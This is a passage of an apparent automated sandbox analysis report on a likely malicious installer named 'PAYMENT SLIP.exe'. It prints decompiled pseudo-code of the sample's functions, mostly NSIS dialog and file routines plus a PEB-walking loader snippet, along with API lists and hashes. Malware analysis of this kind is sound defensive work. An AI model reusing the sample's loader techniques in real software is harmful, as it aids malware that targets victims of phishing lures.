									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404E08(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a324 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044B4(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E004048DC();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404CD9;
							_v56 = _t146;
							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E11(_t146);
								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00406579(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
						E00405E11(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404492(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404492(_t167);
					E004044C7(_t166);
					_t138 = E00406931(8);
					if(_t138 == 0) {
						L53:
						return E004044F9(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































              0x00404983
              0x00404989
              0x0040498f
              0x0040499c
              0x004049aa
              0x004049ad
              0x004049b5
              0x004049bb
              0x004049bb
              0x004049c7
              0x004049ca
              0x00404a38
              0x00404a3f
              0x00404b16
              0x00404b1d
              0x00404b2c
              0x00404b2c
              0x00404b30
              0x00404b3a
              0x00404b47
              0x00404b49
              0x00404b49
              0x00404b57
              0x00404b5e
              0x00404b65
              0x00404b68
              0x00404ba4
              0x00404ba6
              0x00404bac
              0x00404bb1
              0x00404bb5
              0x00404bb7
              0x00404bb7
              0x00404bd3
              0x00000000
              0x00404bd5
              0x00404bd8
              0x00404be6
              0x00404bec
              0x00404bed
              0x00404bf0
              0x00404bf3
              0x00000000
              0x00404bf3
              0x00404b6a
              0x00404b6c
              0x00404b70
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404b72
              0x00404b72
              0x00404b7f
              0x00404b84
              0x00000000
              0x00000000
              0x00404b88
              0x00404b8a
              0x00404b8a
              0x00404b93
              0x00404b95
              0x00404b9a
              0x00404b9d
              0x00404ba2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404ba2
              0x00404bff
              0x00404c09
              0x00404c0c
              0x00404c0f
              0x00404c16
              0x00404c16
              0x00404c18
              0x00404c18
              0x00404c1d
              0x00404c1f
              0x00404c27
              0x00404c2e
              0x00404c30
              0x00404c3b
              0x00404c3b
              0x00404c30
              0x00404c4b
              0x00404c55
              0x00404c5d
              0x00404c78
              0x00404c5f
              0x00404c68
              0x00404c68
              0x00404c5d
              0x00404c7d
              0x00404c82
              0x00404c87
              0x00404c90
              0x00404c90
              0x00404c99
              0x00404c9b
              0x00404c9b
              0x00404ca7
              0x00404caf
              0x00404cb9
              0x00404cb9
              0x00404cbe
              0x00000000
              0x00404cbe
              0x00404b68
              0x00404b1f
              0x00404b26
              0x00000000
              0x00000000
              0x00000000
              0x00404b26
              0x00404a45
              0x00404a4e
              0x00404a68
              0x00404a6d
              0x00404a77
              0x00404a7e
              0x00404a8a
              0x00404a8d
              0x00404a90
              0x00404a97
              0x00404a9f
              0x00404aa2
              0x00404aa6
              0x00404aad
              0x00404ab5
              0x00404b0f
              0x00404ab7
              0x00404ab8
              0x00404abf
              0x00404ac9
              0x00404ad1
              0x00404ade
              0x00404af2
              0x00404af6
              0x00404af6
              0x00404af2
              0x00404afb
              0x00404b08
              0x00404b08
              0x00404ab5
              0x00000000
              0x00404a6d
              0x00404a5b
              0x00000000
              0x00000000
              0x00404a61
              0x00000000
              0x004049cc
              0x004049d9
              0x004049e2
              0x004049ef
              0x004049ef
              0x004049f6
              0x004049fc
              0x00404a05
              0x00404a08
              0x00404a0b
              0x00404a13
              0x00404a16
              0x00404a19
              0x00404a1f
              0x00404a26
              0x00404a2d
              0x00404cc4
              0x00404cd6
              0x00404a33
              0x00404a36
              0x00000000
              0x00404a36
              0x00404a2d

              APIs
              • GetDlgItem.USER32 ref: 004049D2
              • SetWindowTextW.USER32(00000000,?), ref: 004049FC
              • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
              • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
              • lstrcmpiW.KERNEL32(KXCJDFJSKF,00423748,00000000,?,?), ref: 00404AEA
              • lstrcatW.KERNEL32(?,KXCJDFJSKF), ref: 00404AF6
              • SetDlgItemTextW.USER32 ref: 00404B08
                • Part of subcall function 00405B86: GetDlgItemTextW.USER32 ref: 00405B99
                • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                • Part of subcall function 004067EB: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                • Part of subcall function 00404D3F: SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$KXCJDFJSKF
              • API String ID: 2624150263-3518105192
              • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
              • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004021A2, Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E004021A2(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E88( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402D3E(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















              0x004021ab
              0x004021b5
              0x004021bf
              0x004021c9
              0x004021d4
              0x004021d7
              0x004021f1
              0x004021f4
              0x004021fa
              0x004021fd
              0x00402207
              0x0040220b
              0x0040220b
              0x00402210
              0x00402221
              0x00402229
              0x004022e0
              0x004022e0
              0x004022e7
              0x0040222f
              0x0040222f
              0x0040223e
              0x00402242
              0x00402245
              0x0040224b
              0x00402259
              0x0040225c
              0x0040225e
              0x00402269
              0x00402269
              0x0040226e
              0x00402270
              0x00402277
              0x00402277
              0x0040227a
              0x00402283
              0x00402286
              0x0040228c
              0x0040228e
              0x00402298
              0x00402298
              0x0040229b
              0x004022a4
              0x004022a7
              0x004022b0
              0x004022b6
              0x004022b8
              0x004022c6
              0x004022c6
              0x004022c9
              0x004022cf
              0x004022cf
              0x004022d2
              0x004022d8
              0x004022de
              0x004022f3
              0x00000000
              0x00000000
              0x00000000
              0x004022de
              0x004022e9
              0x00402bc5
              0x00402bd1

              APIs
              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateInstance
              • String ID:
              • API String ID: 542301482-0
              • Opcode ID: 72dc8e9db93c4c674b083c5b9862340eb2a4a3a434f4dc697f40a6002f3ad846
              • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
              • Opcode Fuzzy Hash: 72dc8e9db93c4c674b083c5b9862340eb2a4a3a434f4dc697f40a6002f3ad846
              • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402902, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E00402902(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402D3E(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406483( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




              0x0040291a
              0x00402935
              0x00402940
              0x00402941
              0x00402a7b
              0x0040291c
              0x0040291f
              0x00402922
              0x00402925
              0x00402925
              0x00402bc5
              0x00402bd1

              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 3b60821db03e7c89aca0c5b0534f9a5e3572e1c1da5c461867ddc0393e8a1961
              • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
              • Opcode Fuzzy Hash: 3b60821db03e7c89aca0c5b0534f9a5e3572e1c1da5c461867ddc0393e8a1961
              • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B12451, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
              • Instruction ID: 7ff609968e4bb235610e905291245dc1817d9e35ba24376159efee01438a3200
              • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
              • Instruction Fuzzy Hash: 85014C78A10208EFCB40DF98C58099DBBF5EB08320B5085D5E914EB721E330AE509B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B1218C, Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 10001110, Relevance: .0, Instructions: 7COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E10001110() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



              0x10001123

              Memory Dump Source
              • Source File: 00000001.00000002.666317436.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
              • Associated: 00000001.00000002.666313199.0000000010000000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.666320964.0000000010002000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404EFF, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				int _v32;
				void* _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t191;
				signed int _t203;
				void* _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t249;
				signed int _t251;
				signed char _t252;
				signed char _t260;
				void* _t265;
				void* _t267;
				signed char* _t285;
				signed char _t286;
				long _t291;
				void* _t298;
				signed int* _t299;
				int _t300;
				long _t301;
				int _t303;
				long _t304;
				int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t316;
				signed char* _t324;
				int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t191 = GetDlgItem(_a4, 0x408);
				_t298 =  *0x42a2a8;
				_t331 = SendMessageW;
				_v8 = _t191;
				_v36 = _t298;
				_v24 =  *0x42a274 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t307 = _a16;
					} else {
						_a12 = 0;
						_t307 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t307;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
							if(( *0x42a27d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t307 = 0 | _a8 != 0x00000413;
								_t249 = E00404E4D(_v8, _a8 != 0x413);
								_v20 = _t249;
								if(_t249 >= 0) {
									_t100 = _t298 + 8; // 0x8
									_t307 = _t249 * 0x818 + _t100;
									_t251 =  *_t307;
									if((_t251 & 0x00000010) == 0) {
										if((_t251 & 0x00000040) == 0) {
											_t252 = _t251 ^ 0x00000001;
										} else {
											_t260 = _t251 ^ 0x00000080;
											if(_t260 >= 0) {
												_t252 = _t260 & 0x000000fe;
											} else {
												_t252 = _t260 | 0x00000001;
											}
										}
										 *_t307 = _t252;
										E0040117D(_v20);
										_a8 = 0x40f;
										_a12 = _v20 + 1;
										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
									}
								}
								goto L41;
							}
							_t307 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42372c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x423740;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2e0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
									_t329 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t329);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
								}
								goto L93;
							} else {
								E004011EF(_t307, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404ECD();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t307, 0, 0);
									_v36 =  *0x423740;
									_t206 =  *0x42a2a8;
									_v64 = 0xf030;
									_v20 = 0;
									if( *0x42a2ac <= 0) {
										L86:
										if( *0x42a26c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
										}
										goto L90;
									}
									_t299 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
										if(_t212 != 0) {
											_t309 =  *_t299;
											_v72 = _t212;
											_v76 = 8;
											if((_t309 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t299[4]);
												_t299[0] = _t299[0] & 0x000000fe;
											}
											if((_t309 & 0x00000040) == 0) {
												_t216 = (_t309 & 0x00000001) + 1;
												if((_t309 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v20 = _v20 + 1;
										_t299 =  &(_t299[0x206]);
									} while (_v20 <  *0x42a2ac);
									goto L86;
								} else {
									_t300 = E004012E2( *0x423740);
									E00401299(_t300);
									_t227 = 0;
									_t307 = 0;
									if(_t300 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t307, 0);
										_a16 = _t300;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
											_t307 = _t307 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t300);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
								_t301 = 0x20;
							}
							E00401299(_t301);
							SendMessageW(_a4, 0x420, 0, _t301);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42a2e0 = _a4;
					_t303 = 2;
					_v32 = 0;
					_v20 = _t303;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_v16 = _t265;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t267;
					ImageList_AddMasked(_t267, _v16, 0xff00ff);
					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v16);
					_t304 = 0;
					do {
						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
							if(_t304 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
						}
						_t304 = _t304 + 1;
					} while (_t304 < 0x21);
					_t305 = _a16;
					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404492(_a4);
					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404492(_a4);
					_t306 = 0;
					_v16 = 0;
					if( *0x42a2ac <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t324 = _v36 + 8;
						_v28 = _t324;
						do {
							_t285 =  &(_t324[0x10]);
							if( *_t285 != 0) {
								_v64 = _t285;
								_t286 =  *_t324;
								_v88 = _v16;
								_t316 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t316;
